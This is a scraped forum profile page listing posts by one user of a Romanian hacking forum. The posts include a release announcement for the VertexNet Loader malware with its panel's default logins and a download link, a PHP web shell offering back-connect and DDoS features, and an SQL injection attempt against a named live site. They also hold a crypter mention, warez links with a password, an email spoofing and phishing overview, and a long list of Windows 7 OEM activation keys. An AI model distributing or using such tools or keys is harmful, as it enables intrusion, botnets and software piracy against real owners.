-
Posts
1376 -
Joined
-
Last visited
-
Days Won
17
Everything posted by ZeroCold
-
Yahoo Messenger 11 - disponibil pentru download
ZeroCold replied to slacker's topic in Stiri securitate
Daca as putea sa intru pe mai multe adrese odata, in aceeasi fereastra (la fel ca la pidgin) as fi super multumit. Astept mess 12 -
Mai multe informatii aici: http://www.designerwiz.com/vip/AutoBlog-Builder/index.htm Download aici: http://www39.zippyshare.com/v/88678849/file.html Parola aici: rstcenter.com
-
Ac + ciocanel ( ac + manerul cutitului ), eu asa le-am scos
-
Belea Minciuna e banalitate... Lacomia-i calitate Moartea se jeleste'n tabloide Lupii numai ies in haite, se aduna in partide... fara cuvinte...
-
Mersi pt info. Mi-am facut cont si am inceput sa lucrez la cateva template-uri... sper sa mi le accepte Thanks!
-
Ce ziceti, arata bine ? As putea sa vand asa ceva? (doar psd-ul) Daca da, unde? si cam care ar fi pretul? Mersi!
-
"Jennifer Lopez Crypter Fud" WTF!?!! O_O )) ti-am dat pm.
-
After few months of slow work the new version of my second big project VertexNet Loader is out ! Sorry for the time it took, i was really busy these last months so i wasn’t able to code that much for my personal projects. Anyway i think your patience will pay because this version been improved in many places. First of all, the loader is now compiled with Visual Studio 2010 instead of the previous Mingw (Code::Blocks), it is now more Microsoft powered By using this new environment i notice a huge progress for the general stability of the loader, all running smoother. I recode some functions that was pretty unstable and now there working fine. The new builder: As you can see, now you can change the default ping ratio (Keep alive thread and retrieve command thread) Also you can choose enter two loader mode : - Static Library : I really recommend you to use that mode, then it will works in any kind of Microsoft Desktop platforms but the size is bigger (around 140 KiB) - Shared Library : The size of the loader will be smaller (around 50KiB) but will not work in machines that doesn’t have dependency’s installed (normally it should run in all Vista and 7 machines) The panel Also the panel changed, it is now more clear and clean and also stable. The gui is now really better and fashion Notice : I add dead loaders status, that means if a loader is not connected since a long time it will be switched to dead, generally about 3 days, you can chose the number of days before it been considered as dead ( also you can hide them ) Tips : You can put float number for days, example 0.5 days will work The php source is now open, you can see the whole code & comments so respect the credits if you pick some piece from this project, don’t be a fag Remember default panel logins are : Username : root Password : toor DON’T FORGET TO READ THE README.TXT in the package !!! DOWNLOAD: http://vertexnet-loader.com/index.php?page=download
-
Hahaha ) maxim!
-
====[0x0002] Default Login Username : lionaneesh Password : lionaneesh ====== Features [0x01A] Shell [0x01B] Platform Independent [0x01C] Mass - Mailer [0x01D] Small Web-Server Fuzzer [0x01E] DDoser [0x01F] Design [0x02A] Secure Login [0x02B] Deletion of Files ====== New in this version [0x01A] Bind Shell [0x01B] Back Connect [0x01C] Fixed Some Coding errors! [0x01D] Rename Files [0x01E] Encoded Title ====== Download here. or ====== Direct download here.
-
Grea nu, enervanta. Trebuie sa fii atent si... sa ai rabdare Credeam ca sunt 17 coloane
-
Error Based: Union nu imi iese Vlad, da un hint... Devine stresant Imi da: Query failed: ERROR: syntax error at or near "select" at character 116 in /home/virtual/naramori.com/www/public_html_naramori.com/user/function_sjis.php on line 830
-
BUG Mafia - N-ai fost acolo
-
SQL Tutorial - Learn SQL Link: http://www.sql-tutorial.net
-
Link: http://www.toorcon.org/tcx/9_McCray.pdf
-
) daca nu vedeam postul lui vlad nu imi dadeam seama <frameset rows="0,*" frameborder="NO" border="0"> <frame name="topFrame" scrolling="NO" noresize src="top.html" > <frame name="mainFrame" src="http://cecray.tm0004_cbsearch@localhost.hop.clickbank.net"> </frameset> <noframes> <body bgcolor="#FFFFFF" text="#000000"> Get Frames </body> </noframes> </html> Db user ^
-
Vreau si eu!
-
How Email Works? Email sending and receiving is controlled by the Email servers. All Email service providers configure Email Server before anyone can Sign into his or her account and start communicating digitally. Once the servers are ready to go, users from across the world register in to these Email servers and setup an Email account. When they have a fully working Email account, they sign into their accounts and start connecting to other users using the Email services. Email Travelling Path Let’s say we have two Email providers, one is Server1.com and other is Server2.in, ABC is a registered user in Server1.com and XYZ is a registered user in Server2.in. ABC signs in to his Email account in Server1.com, he then writes a mail to the xyz@server2.in and click on Send and gets the message that the Email is sent successfully. But what happens behind the curtains, the Email from the computer of abc@server1.com is forwarded to the Email server of Server1.com. Server1 then looks for server2.in on the internet and forwards the Email of the server2.in for the account of XYZ. Server2.in receives the Email from server1.com and puts it in the account of XYZ. XYZ then sits on computer and signs in to her Email account. Now she has the message in her Email inbox. Email Service Protocols SMTP SMTP stands for Simple Mail Transfer Protocol. SMTP is used when Email is delivered from an Email client, such as Outlook Express, to an Email server or when Email is delivered from one Email server to another. SMTP uses port 25. POP3 POP3 stands for Post Office Protocol. POP3 allows an Email client to download an Email from an Email server. The POP3 protocol is simple and does not offer many features except for download. Its design assumes that the Email client downloads all available Email from the server, deletes them from the server and then disconnects. POP3 normally uses port 110. IMAP IMAP stands for Internet Message Access Protocol. IMAP shares many similar features with POP3. It, too, is a protocol that an Email client can use to download Email from an Email server. However, IMAP includes many more features than POP3. The IMAP protocol is designed to let users keep their Email on the server. IMAP requires more disk space on the server and more CPU resources than POP3, as all Emails are stored on the server. IMAP normally uses port 143. Configuring an Email Server Email server software like Post cast Server, Hmailserver, Surge mail, etc can be used to convert your Desktop PC into an Email sending server. HMailServer is an Email server for Microsoft Windows. It allows you to handle all your Email yourself without having to rely on an Internet service provider (ISP) to manage it. Compared to letting your ISP host your Email, HMailServer adds flexibility and security and gives you the full control over spam protection. Email Security Now let’s check how secure this fast mean of communication is. There are so many attacks which are applied on Emails. There are people who are the masters of these Email attacks and they always look for the innocent people who are not aware of these Email tricks and ready to get caught their trap. You have to make sure that you are not an easy target for those people. You have to secure your Email identity and profile, make yourself a tough target. If you have an Email Id Do not feel that it does not matters if hacked because there is no important information in that Email account, because you do not know if someone gets your Email id password and uses your Email to send a threatening Email to the Ministry or to the News Channels. Attacker is not bothered about your data in the Email. He just wants an Email ID Victim which will be used in the attack. There are a lots of ways by which one can use your Email in wrong means, i am sure that you would have come across some of the cased where a student gets an Email from his friends abusing him or cases on Porn Emails where the owner of the Email does not anything about the sent Email. Email Spoofing Email spoofing is the forgery of an Email header so that the message appears to have originated from someone or somewhere other than the actual source. Distributors of spam often use spoofing in an attempt to get recipients to open, and possibly even respond to, their solicitations. Spoofing can be used legitimately. There are so many ways to send the Fake Emails even without knowing the password of the Email ID. The Internet is so vulnerable that you can use anybody's Email ID to send a threatening Email to any official personnel. Methods to send fake Emails - Open Relay Server - Web Scripts Fake Emails: Open Relay Server An Open Mail Relay is an SMTP (Simple Mail Transfer Protocol) server configured in such a way that it allows anyone on the Internet to send Email through it, not just mail destined ‘To’ or ‘Originating’ from known users. An Attacker can connect the Open Relay Server via Telnet and instruct the server to send the Email. Open Relay Email Server requires no password to send the Email. Fake Emails: via web script Web Programming languages such as PHP and ASP contain the mail sending functions which can be used to send Emails by programming Fake headers i.e.” From: To: Subject:” There are so many websites available on the Internet which already contains these mail sending scripts. Most of them provide the free service. Some of Free Anonymous Email Websites are: Mail.Anonymizer.name (Send attachments as well) Fakemailer.net FakEmailer.info Deadfake.com PHP Mail sending script Consequences of fake emails Email from your Email ID to any Security Agency declaring a Bomb Blast can make you spend rest of your life behind the iron bars. Email from you to your Girl friend or Boy friend can cause Break-Up and set your friend’s to be in relationship. Email from your Email ID to your Boss carrying your Resignation Letter or anything else which you can think of. There can be so many cases drafted on Fake Emails. Proving a fake Email Every Email carry Header which has information about the Travelling Path of the Email Check the Header and Get the location from the Email was Sent Check if the Email was sent from any other Email Server or Website Headers carry the name of the Website on which the mail sending script was used. Email Bombing Email Bombing is sending an Email message to a particular address at a specific victim site. In many instances, the messages will be large and constructed from meaningless data in an effort to consume additional system and network resources. Multiple accounts at the target site may be abused, increasing the denial of service impact. Email Spamming Email Spamming is a variant of Bombing; it refers to sending Email to hundreds or thousands of users (or to lists that expand to that many users). Email spamming can be made worse if recipients reply to the Email, causing all the original addressees to receive the reply. It may also occur innocently, as a result of sending a message to mailing lists and not realizing that the list explodes to thousands of users, or as a result of a responder message (such as vacation(1)) that is setup incorrectly. Email Password Hacking There is no specified attack available just to hack the password of Email accounts. Also, it is not so easy to compromise the Email server like Yahoo, Gmail, etc. Email Password Hacking can be accomplished via some of the Client Side Attacks. We try to compromise the user and get the password of the Email account before it reaches the desired Email server. We will cover many attacks by the workshop flows, but at this time we will talk about the very famous 'Phishing attack'. Phishing The act of sending an Email to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the user into surrendering private information that will be used for identity theft. The Email directs the user to visit a Web site where they are asked to update personal information, such as passwords and credit card, social security, and bank account numbers, that the legitimate organization already has. The Web site, however, is Bogus and set up only to steal the User’s information. Phishing scams could be Emails inviting you to join a Social Group, asking you to Login using your Username and Password. Email saying that Your Bank Account is locked and Sign in to Your Account to Unlock IT. Emails containing some Information of your Interest and asking you to Login to Your Account. Any Email carrying a Link to Click and asking you to Login. Prevention against Phishing Read all the Email Carefully and Check if the Sender is Original Watch the Link Carefully before Clicking Always check the URL in the Browser before Signing IN to your Account Always Login to Your Accounts after opening the Trusted Websites, not by Clicking in any other Website or Email. Email Tracing Tracing an Email means locating the Original Sender and Getting to know the IP address of the network from which the Email was actually generated. To get the information about the sender of the Email we first must know the structure of the Email. As we all know the travelling of the Email. Each message has exactly one header, which is structured into fields. Each field has a name and a value. Header of the Email contains all the valuable information about the path and the original sender of the Email. For tracing an email Address You need to go to your email account and log into the email which you want to trace after that you have to find the header file of the email which is received by you. You will get Source code of the email. (show full headers) Now see from bottom to top and the first IP address you find is the IP address of the sender. Once you have the IP Address of the sender, go to the URL IP Address Geolocation to Identify Website Visitor's Geographical Location and Find the location of the IP Address. And you are done we have traced the person..... And from where he had sent the email. Keystroke loggers Keystroke Loggers (or Key loggers) intercept the Target’s keystrokes and either saves them in a file to be read later, or transmit them to a predetermined destination accessible to the Hacker. Since Keystroke logging programs record every keystroke typed in via the keyboard, they can capture a wide variety of confidential information, including passwords, credit card numbers, and private Email correspondence, names, addresses, and phone numbers. Types of keyloggers Hardware keylogger Software keylogger Some Famous keyloggers Actual Spy Perfect Keylogger Family Keylogger Home Keylogger Soft Central Keylogger Adramax Keylogger Securing your Email account Always configure a Secondary Email Address for the recovery purpose. Properly configure the Security Question and Answer in the Email Account. Do Not Open Emails from strangers. Do Not Use any other’s computer to check your Email. Take Care of the Phishing Links. Do not reveal your Passwords to your Friends or Mates. #sursa: hackingtech.co.tv Este mai mult o sinteza, o prezentare pe scurt, daca vreti sa stiti mai multe puneti mana si cautati
-
You bought a new computer with a pre-installed Starter/Home Premium/Professional (Genuine) version of Windows 7 and want to upgrade to Professional or Ultimate for free in as few as 10 minutes . Your pre-installed version of Windows 7 actually includes all files that are necessary to perform an in-place (local) upgrade without downloading anything from the internet. One simply needs unlocking features included in higher versions. You can upgrade Windows 7 from/to: Here's what you need to do: To upgrade from one edition of Windows 7 to another edition of Windows 7, use Windows Anytime Upgrade. On your PC, open Windows Anytime Upgrade by clicking the Start button, typing Windows Anytime Upgrade in the search box, and then clicking Windows Anytime Upgrade in the list of results. You will be presented with a screen offering 2 options, one of them suggesting you have a valid Windows Anytime Upgrade key. Once the key has been copied into the appropriate field, it will be verified by MS and the upgrade process will take place. The whole process actually doesn't last longer than 10 minutes, your computer will reboot once or twice. Upon restart, you will notice it now runs a genuine higher version of Windows 7. * You can use Windows Anytime Upgrade to upgrade from a 32-bit version of Windows 7 to a 32-bit version of Windows 7 and from a 64-bit version of Windows 7 to a 64-bit version of Windows 7, but you can’t upgrade from a 32-bit version of Windows 7 to a 64-bit version of Windows 7 or vice versa. * Windows Anytime Upgrade isn’t available in all editions of Windows 7 - obviously not in Ultimate version. Keys: Updated: 10-04-2010 Unknown Home Prem: XXXXX-OEM-8992687-00202 Unknown Pro: XXXXX-OEM-8992671-00101 Kraftway Pro: XXXXX-OEM-8992671-00158 STARTER (OEM-8992752) (OEM-8992707) ===================== RDJXR-3M32B-FJT32-QMPGB-GCFF6 --- XXXXX-OEM-8992752-30004 --- ACER/GATEWAY/PACKARD 6K6WB-X73TD-KG794-FJYHG-YCJVG --- XXXXX-OEM-8992752-30005 --- ASUS (Eee) 6PB94-MC2C6-4F37H-KTJ32-PF2PT --- XXXXX-OEM-8992707-00097 --- CASPERERA 36Q3Y-BBT84-MGJ3H-FT7VD-FG72J --- XXXXX-OEM-8992707-00082 --- DELL 4FRH4-WQDGJ-M9HRY-K73D8-RGT3C --- XXXXX-OEM-8992707-00228 --- EXPER RH98C-M9PW4-6DHR7-X99PJ-3FGDB --- XXXXX-OEM-8992752-30008 --- HP PMXH9-M23P9-QJJMB-2FWRC-7CDKP --- XXXXX-OEM-8992752-30007 --- FUJITSU 273P4-GQ8V6-97YYM-9YTHF-DC2VP --- XXXXX-OEM-8992752-30169 --- LENOVO/IBM 22P26-HD8YH-RD96C-28R8J-DCT28 --- XXXXX-OEM-8992707-00153 --- LENOVO/IBM 2K8WH-JVQDM-C9HVC-YR2XC-8M76G --- XXXXX-OEM-8992752-30065 --- MEDION 2W4DJ-JFFJV-DMCPP-2C3X8-883DP --- XXXXX-OEM-8992707-00121 --- MSI 2YKPV-BFXFW-X8GJQ-9KQFF-KCXGD --- XXXXX-OEM-8992752-30271 --- MSI 2XGHP-9TQK2-8CF28-BM2P2-8FRX8 --- XXXXX-OEM-8992752-30269 --- NOKIA 344HQ-3YHDT-C7VCT-BDPBV-4KTR3 --- XXXXX-OEM-8992707-00192 --- OLIDATA PV9BD-YBRX6-CTMG6-CCMJY-X8XG7 --- XXXXX-OEM-8992752-30013 --- SAMSUNG 32J2V-TGQCY-9QJXP-Q3FVT-X8BQ7 --- XXXXX-OEM-8992707-00016 --- SONY TGBKB-9KBGJ-3Y3J6-K8M2F-J2HJQ --- XXXXX-OEM-8992752-30015 --- TOSHIBA 7W842-2HCPJ-BC3MJ-B79K6-TD2HQ --- XXXXX-OEM-8992752-30214 --- VILIV 32TF3-PT6YV-V6GCK-RR8GM-VM4QG --- XXXXX-OEM-8992707-00180 --- ????? HOME BASIC (OEM-8992752) ===================== MB4HF-2Q8V3-W88WR-K7287-2H4CP --- XXXXX-OEM-8992752-50004 --- ACER/GATEWAY/PACKARD 89G97-VYHYT-Y6G8H-PJXV6-77GQM --- XXXXX-OEM-8992752-50005 --- ASUS 36T88-RT7C6-R38TQ-RV8M9-WWTCY --- XXXXX-OEM-8992752-50258 --- DELL 8W3JQ-BP2HY-F47QX-6CQ94-2BKQB --- XXXXX-OEM-8992752-50007 --- FUJITSU DX8R9-BVCGB-PPKRR-8J7T4-TJHTH --- XXXXX-OEM-8992752-50008 --- HP 22MFQ-HDH7V-RBV79-QMVK9-PTMXQ --- XXXXX-OEM-8992752-50213 --- LENOVO/IBM 2P6PB-G7YVY-W46VJ-BXJ36-PGGTG --- XXXXX-OEM-8992752-50013 --- SAMSUNG YV7QQ-RCXQ9-KTBHC-YX3FG-FKRW8 --- XXXXX-OEM-8992752-50014 --- SONY 9DBMT-GXRWM-6Q9Y3-WMYM8-FJCBW --- XXXXX-OEM-8992752-50165 --- TONGFANG 9H4FH-VD69Y-TGBD2-4PM4K-DRMMH --- XXXXX-OEM-8992752-50015 --- TOSHIBA 2TY7W-H4DD4-MB62F-BD9C3-88TM6 --- XXXXX-OEM-8992752-50179 --- ????? 2Q4QP-8P4MD-47YBP-7TXX9-FKDRM --- XXXXX-OEM-8992752-50229 --- ????? HOME PREM (OEM-8992687) ===================== VQB3X-Q3KP8-WJ2H8-R6B6D-7QJB7 --- XXXXX-OEM-8992687-00006 --- ACER/GATEWAY/PACKARD 38JTJ-VBPFW-XFQDR-PJ794-8447M --- XXXXX-OEM-8992687-00304 --- ADVENT V3Y2W-CMF9W-PGT9C-777KD-32W74 --- XXXXX-OEM-8992687-00008 --- ALIENWARE 2QDBX-9T8HR-2QWT6-HCQXJ-9YQTR --- XXXXX-OEM-8992687-00007 --- ASUS 7JQWQ-K6KWQ-BJD6C-K3YVH-DVQJG --- XXXXX-OEM-8992687-00118 --- ASUS (Eee) 6RBBT-F8VPQ-QCPVQ-KHRB8-RMV82 --- XXXXX-OEM-8992687-00095 --- DELL 83K3W-QH8JT-T7KBY-9FQB6-V9R8H --- XXXXX-OEM-8992687-00191 --- DELL C6MHH-TRRPT-74TDC-FHRMV-XB88W --- XXXXX-OEM-8992687-00009 --- FUJITSU 39QDH-D7MHH-WDMTD-TM2R9-KM7DB --- XXXXX-OEM-8992687-00258 --- HCL 4FG99-BC3HD-73CQT-WMF7J-3Q6C9 --- XXXXX-OEM-8992687-00010 --- HP 27GBM-Y4QQC-JKHXW-D9W83-FJQKD --- XXXXX-OEM-8992687-00249 --- LENOVO/IBM 38GRR-KMG3D-BTP99-TC9G4-BBDJJ --- XXXXX-OEM-8992687-00174 --- LG 2P2P9-CM3F8-FTV6P-PC7CX-8TFF7 --- XXXXX-OEM-8992687-00093 --- MEDION 4G3GR-J6JDJ-D96PV-T9B9D-M8X2Q --- XXXXX-OEM-8992687-00246 --- MSI CQBVJ-9J697-PWB9R-4K7W4-2BT4J --- XXXXX-OEM-8992687-00015 --- SAMSUNG HWDFB-YVFG4-3TJ7F-Q3WMT-7B6PH --- XXXXX-OEM-8992687-00138 --- SIRAGON H4JWX-WHKWT-VGV87-C7XPK-CGKHQ --- XXXXX-OEM-8992687-00016 --- SONY 6B88K-KCCWY-4F8HK-M4P73-W8DQG --- XXXXX-OEM-8992687-00057 --- TOSHIBA 6GF36-P4HWR-BFF84-6GFC2-BWX77 --- XXXXX-OEM-8992687-00017 --- TOSHIBA C23T3-9F2T2-FPWBM-XYMW2-272J9 --- XXXXX-OEM-8992687-00143 --- VIEWSONIC 2XPWB-Q64BJ-W8CT3-WJTWT-4DQ99 --- XXXXX-OEM-8992687-00267 --- ????? TTJQ7-4PFJC-6JFJ8-B22VD-VXW88 --- XXXXX-OEM-8992687-00013 --- ????? 7K377-DVP2Q-YGWJG-3M3G7-RBCDP --- XXXXX-OEM-8992687-00194 --- ????? 3743C-T6892-B4PHM-JHFKY-4BB7W --- XXXXX-OEM-8992687-00202 --- ????? PROFESSIONAL (OEM-8992671) ===================== YKHFT-KW986-GK4PY-FDWYH-7TP9F --- XXXXX-OEM-8992671-00004 --- ACER/GATEWAY/PACKARD 4CFBX-7HQ6R-3JYWF-72GXP-4MV6W --- XXXXX-OEM-8992671-00188 --- ALIENWARE 2WCJK-R8B4Y-CWRF2-TRJKB-PV9HW --- XXXXX-OEM-8992671-00407 --- ASUS 32KD2-K9CTF-M3DJT-4J3WC-733WD --- XXXXX-OEM-8992671-00524 --- DELL PT9YK-BC2J9-WWYF9-R9DCR-QB9CK --- XXXXX-OEM-8992671-00007 --- FUJITSU 2QTV2-3CMPP-FQBYK-GRD62-D7XMW --- XXXXX-OEM-8992671-00501 --- HCL 74T2M-DKDBC-788W3-H689G-6P6GT --- XXXXX-OEM-8992671-00008 --- HP 32HPJ-4XRDR-424C8-DYQM9-GM768 --- XXXXX-OEM-8992671-00158 --- KRAFTWAY 237XB-GDJ7B-MV8MH-98QJM-24367 --- XXXXX-OEM-8992671-00437 --- LENOVO/IBM 2QGXM-V9W9W-6Q7MR-64C4X-R26CV --- XXXXX-OEM-8992671-00207 --- LG ? GMJQF-JC7VC-76HMH-M4RKY-V4HX6 --- XXXXX-OEM-8992671-00013 --- SAMSUNG H9M26-6BXJP-XXFCY-7BR4V-24X8J --- XXXXX-OEM-8992671-00014 --- SONY 7RQGM-4BJBD-GM2YY-R2KTT-43HG8 --- XXXXX-OEM-8992671-00282 --- STEG 2V8P2-QKJWM-4THM3-74PDB-4P2KH --- XXXXX-OEM-8992671-00137 --- TOSHIBA 6JKVQ-WJTWW-JVPRB-77TGD-2DV7M --- XXXXX-OEM-8992671-00339 --- WORTMANN 2W3CX-YD4YJ-DF9B2-V27M6-77GMF --- XXXXX-OEM-8992671-00503 --- ????? BV4Y4-DVXDT-3FC64-X2QR7-DW82M --- XXXXX-OEM-8992671-00468 --- ????? 6BJ27-DVBFF-VKQC8-7JPQP-TJKYY --- XXXXX-OEM-8992671-00215 --- ????? 6FWJ7-TDRCV-BYTP3-JWB98-9J64J --- XXXXX-OEM-8992671-00211 --- ????? W2PMW-T7DBH-YHKRM-DXXF6-KP4KT --- XXXXX-OEM-8992671-00015 --- ????? 862R9-99CD6-DD6WM-GHDG2-Y8M37 --- XXXXX-OEM-8992671-00205 --- ????? 7QY32-TQCBJ-G7MC8-Y4PGF-7TGB8 --- XXXXX-OEM-8992671-00284 --- ????? 36KXM-JVMP6-88WMK-YCCGV-YFDVX --- XXXXX-OEM-8992671-00230 --- ????? CRYGF-JG347-QPJKH-BR82M-3MQP3 --- XXXXX-OEM-8992671-00101 --- ????? ULTIMATE (OEM-8992662) ===================== FJGCP-4DFJD-GJY49-VJBQ7-HYRR2 --- XXXXX-OEM-8992662-00006 --- ACER/GATEWAY/PACKARD VQ3PY-VRX6D-CBG4J-8C6R2-TCVBD --- XXXXX-OEM-8992662-00008 --- ALIENWARE 2Y4WT-DHTBF-Q6MMK-KYK6X-VKM6G --- XXXXX-OEM-8992662-00173 --- ASUS 342DG-6YJR8-X92GV-V7DCV-P4K27 --- XXXXX-OEM-8992662-00400 --- DELL 9CW99-79BBF-D4M3X-9BK9M-4RPH9 --- XXXXX-OEM-8992662-00009 --- FUJITSU MHFPT-8C8M2-V9488-FGM44-2C9T3 --- XXXXX-OEM-8992662-00010 --- HP 6K2KY-BFH24-PJW6W-9GK29-TMPWP --- XXXXX-OEM-8992662-00537 --- LENOVO/IBM (Re-released) 49PB6-6BJ6Y-KHGCQ-7DDY6-TF7CD --- XXXXX-OEM-8992662-00015 --- SAMSUNG YJJYR-666KV-8T4YH-KM9TB-4PY2W --- XXXXX-OEM-8992662-00016 --- SONY 2WX6M-X2HKM-86X8X-2QD44-F3FGJ --- XXXXX-OEM-8992662-00481 --- ????? 78FPJ-C8Q77-QV7B8-9MH3V-XXBTK --- XXXXX-OEM-8992662-00366 --- ?????
-
Download: http://hotfile.com/dl/120845752/817ebc3/hacking_837553443.rar.html Sursa: http://www.hackingtech.co.tv/index/hacking_for_beginners/0-127